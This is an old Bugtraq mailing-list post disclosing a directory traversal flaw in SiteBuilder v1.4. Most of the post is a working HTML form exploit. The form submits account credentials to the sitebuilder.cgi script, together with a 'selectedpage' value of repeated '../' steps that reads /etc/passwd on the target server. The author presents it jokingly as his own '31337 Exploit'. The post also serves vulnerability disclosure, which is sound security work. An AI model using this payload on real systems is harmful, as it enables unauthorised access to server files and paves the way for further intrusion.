Date: 31 Aug 2003 14:54:46 -0000
From: "Zero_X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com
Subject: Directory Traversal in SITEBUILDER - v1.4
Directory Traversal in SITEBUILDER - v1.4
With this Code you can view the /etc/passwd
You need a Account.
###################################################################
<html><body><p><center>
<b>Mein 31337 Exploit :-P</b><br>
<form action="http://targethost.com/cgi-bin/sbcgi/sitebuilder.cgi"
method=POST>
<input type="hidden" name="username" value="targetuser">
<input type="hidden" name="password" value="targetpassword">
<input type="hidden" name="selectedpage"
value="../../../../../../../../../../etc/passwd">
<p><input type="submit" name="action" value="Yes - Use Advanced Editor">
<p><input type="submit" value="Return to Site Builder">
</form>
</center></body></html>
###################################################################
Zero X member of www.lobnan.de and www.lostkey.org
